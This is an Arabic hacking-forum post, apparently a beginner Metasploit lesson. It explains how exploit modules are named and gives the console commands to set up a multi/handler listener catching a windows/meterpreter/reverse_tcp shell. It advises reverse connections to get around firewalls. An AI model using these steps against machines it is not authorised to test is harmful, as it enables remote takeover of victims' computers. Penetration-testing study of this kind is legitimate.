التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-22-2009, 11:25 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي [الدرس الخامس] الاكسبلويت واستخداماتها وانواعها


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة

اول شيء :كل عام وانتم الى الله اقرب
ثاني شيء
كيف احوالكم وصحتكم وان شاء الله تكونو بخير وتصوموا ستة شوال مو مثلي :D
ثالث شيء اليوم درسنا عن الاسكبلويت exploits وما هي انواعها ووظيفتها
ووظيفتها يكمن في اسمها ونوعها

يعني درس بسيط ومفهوم بأذن الله

لأستعراض الـ exploit نضع الامر

كود PHP:
show exploits 
الآن رح يظهر امامنا الثغرات

ملاحظة للثغرات والبايلود واقسامها
تكون كذا

windows/browser/yahoomessenger_fvcom

windows/ browser/ yahoomessenger_fvcom
اسم الثغرة | النوع او البرنامج المصاب | نوع النظام المصاب بالثغرة

هذه بأختصار
الآ نجي نشملها شوي
windows : كما ذكرت سابقا وهي ترمز لنوع النظام المصاب ولا يقتصر فقط على وندز وانما يشمل الجميع منل لينوكس ويونكس .. وقليل جدا ما تلاقي لينوكس ويونكس لقلة الثغرات الموجودة به لانه يستعمل امتداد tar.giz اذافة الى انها لا تحتاج اي كراك ولا غيرها ولا برامج تنفيذية .ز يعني لا يشغلها
browser : نوع البرنامج المصاب وهنا في هذه الحالة المتصفح Internet Explorer وانتم تعرفونه وتعرفون ثغرات .. بس بالميتاسبلويت جاهزة وكمان ثغرات ذات امتداد صورة :D افرح يا ولد :057:

yahoomessenger_fvcom : اسم الثغرة في مجلد الميتاسبلويت ويلزم ان يكون اسم الثغرة حسب ما هو مطلوب ضمن اكواد الثغرة

هيك هي تقسم الثغرة الى ثلاث اقسام وهي نوع النظام ونوع البرنامج المصاب واسم الثغرة

الآن لتعرف ماذا تعمل هذه الثغرة او ما البرنامج المصاب واصداره .. يكون موجود في الجانب الايمن شرح موجز بسيط عنه او بأمكانك وضع كلمة Info متبوعة بألثغرة يعني في مثالنا الاعلى يعني يكون الامر كذا
info windows/browser/yahoomessenger_fvcom

الآن يوجد ثغرات شاذة
مثل :...!!

كود PHP:
test/aggressivetest 
كود PHP:
test/exploitme 
كود PHP:
test/kernel 
فهي واضحة
تعمل اختيار سواء لسيرفر او نواة كيرنل

ويوجد هذه ايضا

كود PHP:
multi/handler 
الاغلب يظن ثغرة وهذه يا اخوان هي شبيه جدا بالنت كات .. تعمل تصنت .. لكن فقط تستعمل للميتاسبلويت لانه في اعداداتها يلزمك تضع البايلود والاي بي والبورت ... ما يهمنا الاي بي والبورت لكن اذ لم تضع البايلود فلت يتم الاستغلال يعني لا تستخدم في تصنت على سيرفرات وسيف مود .. ألخ

وهنا سأشرح استخدامها
اول شيء تستخدم امر استخدام الثغرو
كود PHP:
use multi/handler 
ثاني شيء امر ادخال اي بي جهازك للتصنت
كود PHP:
set LHOST 192.168.4.101 
ثالث امر ادخال البورت الذي وضعته في خيارات الثغرة او البايلود <<< رح تفهمها قريباا
كود PHP:
set LPORT 9999 
وبأمكانك وضع اي بورت استخدمته انت في اختيارتك للثغرة

رابع امر وهو اختيار البايلود التي وضعتها في استغلالك لثغرة ما او وضعتها عند انشائك لبايلود .. فتضعها هناا

كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp 
ويفضل للجميع اختيار الاتصال العكسي لتخطي الجدار الناري اذا لم يكن مفتوح بورت .. وهذا بعد التأكد من ان البورت مفتوح

####
اعرف طولتها عليكم
والاغلب مافهم منيح
لكن بعد الدروس القادمة رح تكونون فاهمين كل شيء ... !

$##$#$#$#$#$$$#$#$
تحياتي
لا للاحتكار
المجهوول


Fhg]vs hgohlsD hgh;sfg,dj ,hsjo]hlhjih ,hk,huih


التعديل الأخير تم بواسطة المجهووول ; 11-13-2009 الساعة 04:39 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الدرس الخامس (الاوامر الشرطية) SoLiTair4Ever برمجة الويب 1 09-29-2013 11:22 PM
لدي مشكلة في الدرس الخامس kais bettaieb جـــ'ابات العناكــ'ب 8 07-10-2010 03:09 PM
استفسار متاخر :$ عن الدرس الخامس barca-x جـــ'ابات العناكــ'ب 3 04-23-2010 11:17 PM


الساعة الآن 06:03 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0